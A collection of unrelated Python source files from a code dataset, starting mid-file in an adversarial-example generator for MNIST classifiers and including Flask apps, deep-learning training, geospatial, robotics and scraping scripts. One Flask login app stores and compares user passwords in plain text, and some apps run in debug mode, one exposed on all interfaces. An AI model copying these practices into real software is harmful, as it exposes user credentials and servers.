check)\n #trained_model = load_model(\"MNIST_digits_trained_range_1to1_1d_input.h5\")\n trained_model = tf.keras.models.load_model('my_model_1d_last_dense_activation_seperate')\n output_vector_probabilities = trained_model(fake_image.reshape(1,28,28,1)).numpy()[0]\n\n\n\n real_image = X_desired.reshape(28,28)\n\n confidence_score = np.max(trained_model(X_desired.reshape(1,28,28,1)).numpy()[0])\n\n confidence_score_BOSS = np.max(trained_model(fake_image.reshape(1,28,28,1)).numpy()[0])\n\n #### passing criteria: target_super_set = predicted_super_set(X_BOSS)\n if sup_lbl_from_lbl_2(np.argmax(trained_model(fake_image.reshape(1, 784, 1)).numpy()[0])) == target_super_label:\n succ = succ + 1\n\n\n #### outer loop logger:\n print('[index,succ] = ',[idx,succ],' - [target,predicted] = ',[target_super_label,sup_lbl_from_lbl_2(np.argmax(trained_model(fake_image.reshape(1, 784, 1)).numpy()[0]))],' - [SSIM,JS] = ',[D_ssim_images,D_JS])\n\n D_ssim_images_save.append(D_ssim_images)\n D_JS_save.append(D_JS)\n\n stop = timeit.default_timer()\n run_time_save.append(stop - start)\n BOSS_images.append(fake_image)\n #print('Time: ', stop - start)\n\n\nprint('OVERALL PERFORMANCE: ', 'succ = ' , 100*(succ/number_of_observations) , 'AVG_SSIM_JS = ',[np.mean(D_ssim_images_save),np.mean(D_JS_save)], ' AVG runtime = ',np.mean(run_time_save))\n\n\n# plt.figure()\n# plt.subplot(2,2,1)\n# plt.title('Desired example')\n# plt.imshow(real_image,cmap='gray',vmin=0, vmax=1)\n# plt.colorbar()\n# plt.axis('off')\n# plt.subplot(2,2,2)\n# plt.title('Generated example')\n# plt.imshow(fake_image,cmap='gray',vmin=0, vmax=1)\n# plt.colorbar()\n# plt.axis('off')\n# plt.subplot(2,2,4)\n# plt.title('Generated example PMF')\n# plt.stem(output_vector_probabilities)\n# plt.ylim(top=1.2)\n# plt.subplot(2,2,3)\n# plt.title('Desired PMF')\n# plt.stem(Y_val_combined[0])\n# plt.ylim(top=1.2)\n\n\n\nprint('break')\n\n\n\n","sub_path":"GenNNs_BOSS_MNIST_fashion_HCs_FHC_Targ.py","file_name":"GenNNs_BOSS_MNIST_fashion_HCs_FHC_Targ.py","file_ext":"py","file_size_in_byte":17844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"478704292","text":"#!/usr/bin/python3\n\"\"\" Flask app that lists all State objects in HTML \"\"\"\n\nfrom flask import Flask\nfrom models import storage\nfrom models.state import State\nfrom flask import render_template\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\n\n\n@app.teardown_appcontext\ndef close_storage(self):\n    \"\"\"Close storage session\"\"\"\n    storage.close()\n\n\n@app.route('/states_list')\ndef trace_route():\n    \"\"\" Display states in HTML\"\"\"\n    states = storage.all(State).values()\n    return render_template('7-states_list.html', states=states)\n\n\nif __name__ == \"__main__\":\n    app.run(port=5000, host='0.0.0.0', debug=True)\n","sub_path":"web_flask/7-states_list.py","file_name":"7-states_list.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"234845803","text":"# Importing libs\nfrom flask import Flask, url_for, redirect, request, render_template\n\nclass Utils:\n\n    def read_file(self, file_name):\n        file = open(file_name, \"r+\")\n        lines = file.readlines()\n        file.close()\n\n        return lines\n\n    def load_users(self, list_users):\n        dict_current_users = {}\n        for user in list_users:\n            dict_current_users.update({user.split(\"|\")[0]: user.split(\"|\")[1]})\n\n        return dict_current_users\n\n    def load_grades(self, grades, user):\n        dict_current_grades = {}\n        for grade in grades:\n            
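# NOTE (added, an assumption from the parsing code): each grades record appears to be\n            # pipe-delimited, user|grade1|...|gradeN plus a trailing newline field, so the\n            # [1:-1] slice below keeps only the grade values\n            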
dict_current_grades.update({grade.split('|')[0]: grade.split('|')[1:-1]})\n return dict_current_grades.get(user)\n\n def validate_login(self, username, password):\n try:\n current_users = self.read_file(\"keylogs.txt\")\n except FileNotFoundError:\n current_users = []\n\n dict_current_users = self.load_users(current_users)\n\n try:\n return password == dict_current_users[username]\n except KeyError:\n return False\n\n\n# app Flask instance\napp = Flask(__name__)\n\nusers_projects = {'rafael': [[0, 'ler documentação flask', '31/03/2019', 'Rafael'],\n [1, 'ler documentação jinja', '31/03/2019', 'Rafael']],\n 'tonho': [[0, 'estudar IA', '31/03/2019', 'Tonho'],\n [1, 'estudar paradigmas', '31/03/2019', 'Tonho']]}\n\nprojects_activities = {'rafael0':\n[\n [0, 'Nome ativ_1 proj_0','14/03/2019', '31/03/2019', 'Rafael', 'Detalhamento Ativ 1'],\n [1, 'Nome ativ_2 proj_0','14/03/2019', '31/03/2019', 'Rafael', 'Detalhamento Ativ 2'],\n [2, 'Nome ativ_3 proj_0','14/03/2019', '31/03/2019', 'Rafael', 'Detalhamento Ativ 3']\n],\n 'rafael1':\n[\n [0, 'Nome ativ_1 proj_1','14/03/2019', '31/03/2019', 'Rafael', 'Detalhamento Ativ 1'],\n [1, 'Nome ativ_2 proj_1','14/03/2019', '31/03/2019', 'Rafael', 'Detalhamento Ativ 2'],\n [2, 'Nome ativ_3 proj_1','14/03/2019', '31/03/2019', 'Rafael', 'Detalhamento Ativ 3']\n],\n 'tonho0':\n[\n [0, 'Nome ativ_1 proj_0','14/03/2019', '31/03/2019', 'Tonho', 'Detalhamento Ativ 1'],\n [1, 'Nome ativ_2 proj_0','14/03/2019', '31/03/2019', 'Tonho', 'Detalhamento Ativ 2'],\n [2, 'Nome ativ_3 proj_0','14/03/2019', '31/03/2019', 'Tonho', 'Detalhamento Ativ 3']\n],\n 'tonho1':\n[\n [0, 'Nome ativ_1 proj_1','14/03/2019', '31/03/2019', 'Tonho', 'Detalhamento Ativ 1'],\n [1, 'Nome ativ_2 proj_1','14/03/2019', '31/03/2019', 'Tonho', 'Detalhamento Ativ 2'],\n [2, 'Nome ativ_3 proj_1','14/03/2019', '31/03/2019', 'Tonho', 'Detalhamento Ativ 3']\n]}\n\n\n# route to /\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n login = request.form['username']\n password = request.form['password']\n\n util = Utils()\n if util.validate_login(login, password):\n return render_template('oi.html', username=login, projects= users_projects)\n else:\n return render_template('index.html', erro='Login e/ou senha incorreto')\n\n return(render_template('index.html', erro='Método não permitido.'))\n\n\n@app.route('/prepare_activities')\ndef prepare_activities():\n username = request.args.get('username')\n proj = request.args.get('proj')\n project_id = username+str(proj)\n\n return render_template('activities.html', username= username,\n activities= projects_activities[project_id],\n project= project_id)\n\n@app.route('/activity')\ndef detail_activity():\n username = request.args.get('username')\n project_id = request.args.get('project_id')\n activity = request.args.get('activity')\n\n print(project_id, '\\n', activity)\n my_activity = projects_activities[project_id][int(activity)]\n\n return render_template('activity.html', username= username,\n activity= my_activity)\n\n# Starting app\nif __name__ == '__main__':\n app.run(debug=True)\n\n","sub_path":"LTP 2/learningFlask/00 lessons/2019-03-14/projects_main.py","file_name":"projects_main.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"517642572","text":"from torchvision import datasets\r\nimport torch\r\nimport torch.nn as nn\r\nfrom 
torchvision.transforms import transforms\r\nimport time\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nbatch_size = 96\r\nnum_workers = 0\r\nn_epoches = 100\r\n\r\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\nprint(\"using {} device.\".format(device))\r\n\r\ntrain_transform = transforms.Compose([\r\n    transforms.Resize(size=(256,256)),\r\n    transforms.RandomResizedCrop(224),\r\n    transforms.RandomHorizontalFlip(),\r\n    transforms.RandomRotation(20),\r\n    transforms.ToTensor(),\r\n    transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n])\r\nvalidate_transform = transforms.Compose([\r\n    transforms.Resize(size=(256,256)),\r\n    transforms.RandomResizedCrop(224),\r\n    transforms.RandomHorizontalFlip(),\r\n    transforms.ToTensor(),\r\n    transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n])\r\n\r\ndata_dir = './FIRE-SMOKE-DATASET/FIRE-SMOKE-DATASET'\r\ntrain_dir = data_dir + '/Train'\r\nvalidate_dir = data_dir + '/Validation'\r\n\r\ntrain_data = datasets.ImageFolder(train_dir, transform=train_transform)\r\ntrain_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size, num_workers=num_workers, shuffle=True)\r\nvalidate_data = datasets.ImageFolder(validate_dir, transform=validate_transform)\r\nvalidate_loader = torch.utils.data.DataLoader(validate_data, batch_size=batch_size, num_workers=num_workers, shuffle=True)\r\n\r\nclass ZFNetbn(nn.Module):\r\n\r\n    def __init__(self, num_classes=2):\r\n        super(ZFNetbn, self).__init__()\r\n        self.features = nn.Sequential(\r\n            nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=2),\r\n            nn.BatchNorm2d(64),\r\n            nn.ReLU(inplace=True),\r\n            nn.MaxPool2d(kernel_size=3, stride=2),\r\n            nn.Conv2d(64, 192, kernel_size=5, stride=2, padding=2),\r\n            nn.BatchNorm2d(192),\r\n            nn.ReLU(inplace=True),\r\n            nn.MaxPool2d(kernel_size=3, stride=2),\r\n            nn.Conv2d(192, 384, kernel_size=3, padding=1),\r\n            nn.BatchNorm2d(384),\r\n            nn.ReLU(inplace=True),\r\n            nn.Conv2d(384, 256, kernel_size=3, padding=1),\r\n            nn.BatchNorm2d(256),\r\n            nn.ReLU(inplace=True),\r\n            nn.Conv2d(256, 256, kernel_size=3, padding=1),\r\n            nn.BatchNorm2d(256),\r\n            nn.ReLU(inplace=True),\r\n            nn.MaxPool2d(kernel_size=3, stride=2),\r\n        )\r\n        self.avgpool = nn.AdaptiveAvgPool2d((6, 6))\r\n        self.classifier = nn.Sequential(\r\n            nn.Dropout(),\r\n            nn.Linear(256 * 6 * 6, 4096),\r\n            nn.ReLU(inplace=True),\r\n            nn.Dropout(),\r\n            nn.Linear(4096, 4096),\r\n            nn.ReLU(inplace=True),\r\n            nn.Linear(4096, num_classes),\r\n        )\r\n\r\n    def forward(self, x):\r\n        x = self.features(x)\r\n        x = self.avgpool(x)\r\n        x = torch.flatten(x, 1)\r\n        x = self.classifier(x)\r\n        return x\r\n\r\nmodel = ZFNetbn(num_classes = 2)\r\nmodel = model.to(device)\r\n\r\ncriterion = torch.nn.CrossEntropyLoss()\r\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001)\r\n\r\ntrain_accuracy_list = []\r\ntrain_loss_list = []\r\n\r\ndef train(epochs, train_loader, model, optimizer, criterion, save_path):\r\n    best_acc = 0\r\n    time_start = time.time()\r\n    for epoch in range(epochs+1):\r\n        train_loss = 0.0\r\n        train_acc = 0.0\r\n        validate_loss = 0.0\r\n        validate_acc = 0.0\r\n        model.train()\r\n        for batch_idx, (data, target) in enumerate(train_loader):\r\n            data = data.to(device)\r\n            target = target.to(device)\r\n            optimizer.zero_grad()\r\n            output = model(data)\r\n            _, preds = torch.max(output, 1)\r\n            loss = criterion(output, target)\r\n            loss.backward()\r\n            optimizer.step()\r\n            train_acc = train_acc + torch.sum(preds == target.data)\r\n            train_loss = train_loss + ((1 / (batch_idx + 1)) * 
(loss.data - train_loss))\r\n        model.eval()\r\n        with torch.no_grad():\r\n            for batch_idx, (data, target) in enumerate(validate_loader):\r\n                data = data.to(device)\r\n                target = target.to(device)\r\n                output = model(data)\r\n                _, preds = torch.max(output, 1)\r\n                loss = criterion(output, target)\r\n                validate_acc = validate_acc + torch.sum(preds == target.data)\r\n                validate_loss = validate_loss + loss.item()\r\n        # train_loss is already a running mean over batches, so it is not divided again\r\n        train_acc = train_acc / len(train_loader.dataset)\r\n        validate_loss = validate_loss / len(validate_loader.dataset)\r\n        validate_acc = validate_acc / len(validate_loader.dataset)\r\n        train_accuracy_list.append(train_acc)\r\n        train_loss_list.append(train_loss)\r\n        print('Epoch: {} \\tTraining Acc: {:6f} \\tTraining Loss: {:6f}'.format(epoch, train_acc, train_loss))\r\n        if validate_acc > best_acc:\r\n            best_acc = validate_acc\r\n            torch.save(model.state_dict(), save_path)\r\n    time_end = time.time()\r\n    train_time = (time_end - time_start)/epochs\r\n    print('Training Time for Each Epoch is ', train_time)\r\n    print('finished training')\r\n\r\ntrain(n_epoches, train_loader, model, optimizer, criterion,'./trained-model-ZFNetbn.pth')\r\n\r\nplt.style.use(\"ggplot\")\r\nplt.figure()\r\nplt.plot(train_accuracy_list, label=\"train_acc\")\r\nplt.title(\"ZFNet with BN Train Accuracy\")\r\nplt.xlabel(\"Epoch #\")\r\nplt.ylabel(\"Accuracy\")\r\nplt.show()\r\n\r\n#Test\r\ntest_dir = data_dir + '/Test'\r\ntest_transforms = transforms.Compose([\r\n    transforms.Resize(size=(224,224)),\r\n    transforms.ToTensor(),\r\n    transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n])\r\ntest_dataset = datasets.ImageFolder(test_dir, transform=test_transforms)\r\ntest_dataloader = torch.utils.data.DataLoader(test_dataset, batch_size=96, shuffle=True)\r\nnum_classes = 2\r\nsave_path = './trained-model-ZFNetbn.pth'\r\nnet = ZFNetbn(num_classes=num_classes)\r\nnet = net.to(device)\r\nnet.load_state_dict(torch.load(save_path))\r\ntest_acc = 0\r\nnet.eval()\r\nstart_time = time.time()\r\nwith torch.no_grad():\r\n    for data in test_dataloader:\r\n        images, labels = data\r\n        images = images.to(device)\r\n        labels = labels.to(device)\r\n        output = net(images)\r\n        _, prediction = torch.max(output.data, 1)\r\n        test_acc = test_acc + torch.sum(prediction == labels)\r\ntest_acc = test_acc / len(test_dataloader.dataset)\r\nend_time = time.time()\r\nprint(\"test time is \", end_time - start_time)\r\nprint('Test Accuracy is ', test_acc)","sub_path":"ZFNetbn.py","file_name":"ZFNetbn.py","file_ext":"py","file_size_in_byte":6587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"405294044","text":"\"\"\"\nalignment.py\n\nAuthor: Tobias Seydewitz\nDate: 01.06.18\nMail: tobi.seyde@gmail.com\n\"\"\"\nimport numpy as np\nfrom time import time\nfrom rasterio.features import rasterize\nfrom tropicly.raster import (clip,\n                             write,\n                             merge_from,\n                             clip_raster,\n                             round_bounds,\n                             polygon_from,\n                             int_to_orient,\n                             reproject_like,\n                             make_warp_profile,)\n\n\nCRS = {'init': 'epsg:4326'}\n\n\ndef worker(template, alignments, vector, pathobj):\n    # TODO refactor\n    kwargs = make_warp_profile(template, CRS)\n    kwargs['out'] = pathobj\n\n    out = raster_alignment(alignments, **kwargs)\n\n    data = rasterize_vector(vector, kwargs['transform'], kwargs['bounds'], (kwargs['height'], kwargs['width']))\n    name = 'ifl{:x}.tif'.format(id(data))\n    out['ifl'] = write(data, str(pathobj/name), **kwargs)\n\n    kwargs['bounds'] = round_bounds(kwargs['bounds'])\n\n    
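# NOTE (added recap of the steps above): the worker reprojects/merges the input rasters\n    # onto one grid, burns the vector layer onto that same grid, then clips everything to\n    # the rounded bounds\n    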
return raster_clip(out, **kwargs)\n\n\ndef raster_alignment(alignments, **kwargs):\n    # TODO refactor\n    out = {}\n\n    for key, values in alignments.items():\n        values = list(set(values))\n\n        name = '{}{:x}.tif'.format(key, abs(hash(''.join(values) + str(time()))))\n        path = str(kwargs['out']/name)\n\n        err_msg = 'Failed at {} files {}'.format(key, values)\n\n        if len(values) == 1:\n            try:\n                out[key] = reproject_like(*values, path, **kwargs)\n            except Exception:\n                print(err_msg)\n\n        elif len(values) > 1:\n            try:\n                data, affine = merge_from(values, bounds=kwargs['bounds'], res=kwargs['res'])\n                out[key] = write(data, path, **kwargs)\n            except Exception:\n                print(err_msg)\n\n        else:\n            continue\n\n    return out\n\n\ndef raster_clip(to_clip, bounds, **kwargs):\n    orientation = int_to_orient(bounds.left, bounds.top)\n    out = {}\n\n    for key, value in to_clip.items():\n        name = '{}_{}.tif'.format(key, orientation)\n        path = str(kwargs['out']/name)\n\n        data, transform = clip_raster(value, bounds)\n        kwargs.update({'transform': transform})\n        out[key] = write(data, path, **kwargs)\n\n    return out\n\n\ndef rasterize_vector(vector, transform, bounds, shape):\n    \"\"\"\n    Rasterize the geometries of a vector layer onto a raster grid.\n\n    :param vector: vector data with a geometry column (e.g. a GeoDataFrame)\n    :param transform: affine transform of the target raster grid\n    :param bounds: bounding box used to select and clip the geometries\n    :param shape: (height, width) of the output raster\n    :return: uint8 raster of the rasterized geometries, all zeros if no geometry intersects\n    \"\"\"\n    clipper = polygon_from(bounds)\n    geometries = list(vector.cx[bounds[0]:bounds[2], bounds[1]:bounds[3]].geometry)\n\n    if geometries:\n        clipped = clip(clipper, geometries)\n        raster = rasterize(clipped, out_shape=shape, transform=transform, dtype=np.uint8)\n\n        return raster\n\n    return np.zeros(shape=shape, dtype=np.uint8)\n","sub_path":"tropicly/alignment.py","file_name":"alignment.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"308352449","text":"import turtle\n\ndef apply_rules(letter):\n    \"\"\"Apply rules to an individual letter, and return the result.\"\"\"\n    # Rule 1\n    if letter == 'X':\n        new_string = 'F[+X][-X]FX'\n\n    # Rule 2\n    elif letter == 'F':\n        new_string = 'FF'\n\n    # no rules apply so keep the character\n    else:\n        new_string = letter\n\n    return new_string\n\ndef process_string(original_string):\n    \"\"\"Apply rules to a string, one letter at a time, and return the result.\"\"\"\n    transformed_string = \"\"\n    for letter in original_string:\n        transformed_string = transformed_string + apply_rules(letter)\n\n    return transformed_string\n\ndef create_l_system(number_of_iterations, axiom):\n    \"\"\"Begin with an axiom, and apply rules to the original axiom string number_of_iterations times, then return the result.\"\"\"\n    start_string = axiom\n    for counter in range(number_of_iterations):\n        end_string = process_string(start_string)\n        start_string = end_string\n\n    return end_string\n\ndef draw_l_system(some_turtle, instructions, angle, distance):\n    \"\"\"Draw with some_turtle, interpreting each letter in the instructions passed in.\"\"\"\n    saved_info_list = []\n    for task in instructions:\n        if task == 'F':\n            some_turtle.forward(distance)\n        elif task == 'B':\n            some_turtle.backward(distance)\n        elif task == '+':\n            some_turtle.right(angle)\n        elif task == '-':\n            some_turtle.left(angle)\n        elif task == '[':\n            saved_info_list.append([some_turtle.heading(), some_turtle.xcor(), some_turtle.ycor()])\n            \n            # print(saved_info_list)\n        elif task == ']':\n            some_turtle.begin_fill()\n            some_turtle.circle(3)\n            some_turtle.end_fill()            \n            new_info = saved_info_list.pop()\n            some_turtle.setheading(new_info[0])\n            some_turtle.goto(new_info[1], new_info[2])\n\n# create the string of turtle 
instructions,\n# with 6 iterations and an axiom of X\ninstruction_string = create_l_system(6, \"X\")\nprint(instruction_string)\n\n# setup for drawing\nwindow = turtle.Screen()\nwindow.tracer(2)\njill = turtle.Turtle()\njill.color(\"green\")\njill.speed(0)\n\n# using screen.tracer() speeds up your drawing (by skipping some frames when drawing)\n#window.tracer(10)\n\n# move turtle to bottom and middle of screen\njill.goto(0, -200)\njill.left(90)\n\n# draw the picture, using angle 25.7 and segment length 5\ndraw_l_system(jill, instruction_string, 25.7, 5)\n","sub_path":"l-systems-lists.py","file_name":"l-systems-lists.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"642220468","text":"from locust import HttpUser, TaskSet, task, between\nfrom lib import flow_sign_up, flow_helper\nimport logging\n\n\nclass SignUpLoad(TaskSet):\n    def on_start(self):\n        logging.info(\"*** Starting Sign-Up load tests ***\")\n\n    def on_stop(self):\n        logging.info(\"*** Ending Sign-Up load tests ***\")\n\n    \"\"\" @task() : value=3 executes 3x as often as value=1 \"\"\"\n    \"\"\" Things inside task are synchronous. Tasks are async \"\"\"\n\n    @task(1)\n    def sign_up_load_test(self):\n        # GET the root\n        flow_helper.do_request(self, \"get\", \"/\", \"/\", \"\")\n\n        # This performs the entire sign-up flow\n        flow_sign_up.do_sign_up(self)\n\n        # Should be able to get the /account page now\n        flow_helper.do_request(self, \"get\", \"/account\", \"/account\", \"\")\n\n        # Now log out.\n        # You'd think that this would leave you at \"/\", but it returns a 204 and leaves you be.\n        flow_helper.do_request(self, \"get\", \"/logout\", \"/logout\", \"\")\n\n\nclass WebsiteUser(HttpUser):\n    tasks = [SignUpLoad]\n    # number seconds simulated users wait between requests\n    wait_time = between(5, 9)\n","sub_path":"load_testing/sign_up.locustfile.py","file_name":"sign_up.locustfile.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"330915298","text":"from django import forms\nfrom .models import Order, OrderDocument\n\nclass OrderCreateForm(forms.ModelForm):\n    recipientfirstname = forms.CharField(label='Nombres',\n        help_text='De la persona que recibirá los documentos.')\n    recipientlastname = forms.CharField(label='Apellidos',\n        help_text='De la persona que recibirá los documentos.')\n    address = forms.CharField(label='Dirección',\n        help_text='Utilice el idioma del país de destino en la dirección.',)\n    postal_code = forms.CharField(label='Código postal')\n    city = forms.CharField(label='Ciudad')\n    province = forms.CharField(label='Estado, provincia o departamento')\n    country = forms.CharField(label='País')\n\n    class Meta:\n        model = Order\n        fields = ['recipientfirstname',\n                  'recipientlastname',\n                  'address',\n                  'postal_code',\n                  'city',\n                  'province',\n                  'country',\n                  ]\n        widgets = {\n            'tracker':forms.HiddenInput(),\n            'status':forms.HiddenInput(),\n            'creator':forms.HiddenInput(),\n            'userfirstname':forms.HiddenInput(),\n            'userlastname':forms.HiddenInput(),\n            'email': forms.HiddenInput(),\n        }\n\nclass OrderCancelForm(forms.ModelForm):\n    ORDER_STATUS_CHOICES= (\n        ('70', 'Anulada'),\n    )\n\n    status = forms.CharField()\n\n    class Meta:\n        model = Order\n        fields = {\n            'status',\n        }\n\nclass OrderDocumentForm(forms.ModelForm):\n\n    doctype = forms.ChoiceField(label=\"Tipo de documento\",\n        choices=OrderDocument.ORDER_DOCTYPES_CHOICES)\n    description = 
forms.CharField(label=\"Descripción\",\n help_text='Puede colocar alguna descripción del documento si lo desea.')\n document = forms.FileField(label=\"Buscar documento\")\n\n\n class Meta:\n model = OrderDocument\n fields = ('doctype', 'description', 'document', )\n","sub_path":"orders/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"213666328","text":"#!/usr/bin/env python3\n#\n# The following code has been adapted from client_audio.py provided \n# by CONSEQUENTIAL ROBOTICS for detecting audio\n\nimport rospy\nimport numpy as np\nimport wave, struct\nimport matplotlib.pyplot as plt\nfrom audio_detection.process_audio import ProcessAudio\nfrom audio_detection.preprocessing import ProcessMiRo\n \n# sample count\nSAMPLE_COUNT = 640\t#32 ms\n\nclass RosCooDetection():\n\n\tdef listening(self, save = False, input = None):\n\t\t\n\t\t# loop\n\t\tdetected_sound = np.zeros((0, 1), 'uint16')\n\t\tprocessed_sound = np.empty(0)\n\t\ttotal_filtered_signal = np.empty(0)\n\t\t\n\t\twhile not rospy.is_shutdown():\n\n\t\t\tself.micbuf = self.mic_data.micbuf\n\t\t\tself.outbuf = self.mic_data.outbuf\n\t\t\tself.startCheck = self.mic_data.startCheck\n\n\t\t\tif self.startCheck is True and not self.outbuf is None:\n\t\t\t\t\n\t\t\t\t# get audio from left ear of Miro\n\t\t\t\tdetect_sound = np.reshape(self.outbuf[:, [1]], (-1))\n\n\t\t\t\t# downsample for playback. sample rate is set to 16000.\n\t\t\t\toutbuf = np.zeros((int(SAMPLE_COUNT / 1.25), 0), 'uint16')\n\t\t\t\ti = np.arange(0, SAMPLE_COUNT, 1.25)\n\t\t\t\tj = np.arange(0, SAMPLE_COUNT)\n\t\t\t\tx = np.interp(i, j, detect_sound[:])\n\t\t\t\toutbuf = np.concatenate((outbuf, x[:, np.newaxis]), axis=1)\n\t\t\t\toutbuf = outbuf.astype(int)\n\t\t\t\toutbuf = np.reshape(outbuf[:, [0]], (-1))\n\n\t\t\t\t# set new signal for processing\n\t\t\t\tself.processing_data.set_signal(outbuf)\n\t\t\t\tif input == None:\n\t\t\t\t\tprocessed_data, accumulation, filtered_signal = self.processing_data.process_miro_detection()\n\t\t\t\telse:\n\t\t\t\t\tprocessed_data, accumulation, filtered_signal = self.processing_data.process_miro_detection(input = input)\n\t\t\t\t# collect data from the micbuf for making audio file for re-listening later and also to graph the necessary data\n\t\t\t\tdetected_sound = np.append(detected_sound, outbuf)\t\t# audio\n\t\t\t\tprocessed_sound = np.append(processed_sound, processed_data)\t\t# ste\n\t\t\t\ttotal_filtered_signal = np.append(total_filtered_signal, filtered_signal)\t\t# filtered sound\n\t\t\t\tself.mic_data.startCheck = False # to show micbuf data has been processed\n\n\t\t\t\tif save == False:\n\t\t\t\t\treturn accumulation[len(accumulation) - 1]\n\n\t\tif save == True:\n\t\t\t# plot\n\t\t\tplt.figure(figsize=(12, 6))\n\t\t\tplt.subplot(2,2,1)\n\t\t\tplt.plot(detected_sound)\n\t\t\tplt.subplot(2,2,2)\n\t\t\tplt.plot(total_filtered_signal)\n\t\t\tplt.subplot(2,2,3)\n\t\t\tplt.plot(processed_sound)\n\t\t\tplt.subplot(2,2,4)\n\t\t\tplt.plot(accumulation)\n\t\t\tplt.show()\n\n\t\t\t# save audio file throughout the whole running process\n\t\t\toutfilename = 'tmp/client_audio.wav'\t# audio file location\n\t\t\tfile = wave.open(outfilename, 'wb')\n\t\t\tfile.setframerate(16000)\n\t\t\tfile.setsampwidth(2)\n\t\t\t\n\t\t\tprint(\"writing one CENTRE channel to file with sample length \" + str(len(detected_sound)))\n\t\t\tfile.setnchannels(1)\n\t\t\tfor s in detected_sound:\n\t\t\t\tfile.writeframes(struct.pack(' 
0:\n        read_size = min(remaining,chunk)\n        rf.seek(remaining - read_size)\n        read_buf = rf.read(read_size)\n        wf.write(read_buf[::-1])\n        remaining -= chunk\n\nif __name__ == \"__main__\":\n    reverse_binary(\"test.tgz\")\n","sub_path":"reversebinfile3.py","file_name":"reversebinfile3.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"92552549","text":"import os\nfrom flask import Flask\nimport dotenv\nfrom flask_swagger_ui import get_swaggerui_blueprint\nimport pymysql\n\ndotenv.load_dotenv()\n\n\napp: Flask = Flask(__name__)\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = f\"mysql+pymysql://{os.environ['db_user']}:{os.environ['db_password']}\" \\\n                                        f\"@{os.environ['db_host']}:{os.environ['db_port']}/{os.environ['db_schema']}\"\n\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n\nswagger_url: str = '/api/docs' \nswagger_data_route: str = '/swagger-data' \nswaggerui_blueprint = get_swaggerui_blueprint(\n    swagger_url, \n    swagger_data_route,\n    config={\n        'app_name': \"Pedregulho\"\n    }\n)\napp.register_blueprint(\n    swaggerui_blueprint\n)\n","sub_path":"src/Setup/API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"83491731","text":"import csv\nimport re\nimport sqlite3\nfrom typing import List\nimport requests\nimport lxml.html\n\ndef main():\n    \"\"\"\n    Main entry point: calls the three functions fetch(), scrape() and save().\n    \"\"\"\n    url = 'https://gihyo.jp/dp'\n    html = fetch(url)\n    books = scrape(html, url)\n    save('books.db', books)\n    save_file('books.csv', books)\n\ndef fetch(url: str)-> str:\n    \"\"\"\n    Fetch the web page at the URL given by the url argument.\n    The page encoding is taken from the Content-Type header.\n    Returns: the HTML as a str\n    \"\"\"\n    r = requests.get(url)\n    return r.text # return the string decoded with the encoding taken from the HTTP headers\n\ndef scrape(html: str, base_url: str)-> List[dict]:\n    \"\"\"\n    Extract book information from the HTML given by the html argument.\n    The base_url argument is the base URL used when converting links to absolute URLs.\n    Returns: a list of books (dicts)\n    \"\"\"\n    books =[]\n    html = lxml.html.fromstring(html)\n    html.make_links_absolute(base_url) # converts the href attribute of every a element to an absolute URL\n\n    # cssselect() returns the list of a elements matching the selector; each a element is processed in turn.\n    # Selector meaning: an a element with an itemprop=\"url\" attribute that is a direct child of an li element that is a direct child of the element with id=\"listBook\"\n    for a in html.cssselect('#listBook > li > a[itemprop=\"url\"]'):\n        # get the book URL from the href attribute of the a element\n        url = a.get('href')\n\n        # the book title comes from the p element with an itemprop=\"name\" attribute\n        p = a.cssselect('p[itemprop=\"name\"]')[0]\n        title = p.text_content() # text_content is used instead of text because the element contains wbr elements and the like\n\n        books.append({'url':url, 'title':title})\n\n    return books\n\ndef save(db_path: str, books: List[dict]):\n    \"\"\"\n    Save the list of books given by the books argument to a SQLite database.\n    The database path is given by the db_path argument.\n    Returns: nothing\n    \"\"\"\n\n    conn = sqlite3.connect(db_path)\n    c = conn.cursor()\n    c.execute('DROP TABLE IF EXISTS books')\n    c.execute('''\n        CREATE TABLE books(\n            title text,\n            url text\n        )\n    ''')\n    c.executemany('INSERT INTO books VALUES(:title, :url)', books)\n\n    conn.commit()\n    conn.close()\n\ndef save_file(file_path: str, books: List[dict]):\n    \"\"\"\n    Save the list of books given by the books argument to a CSV file.\n    The file path is given by the file_path argument.\n    Returns: nothing\n    \"\"\"\n    with open(file_path, 'w', newline='') as f:\n        # the first argument is the file object, the second is the list of field names\n        writer = csv.DictWriter(f, ['url', 'title'])\n        writer.writeheader() # write the 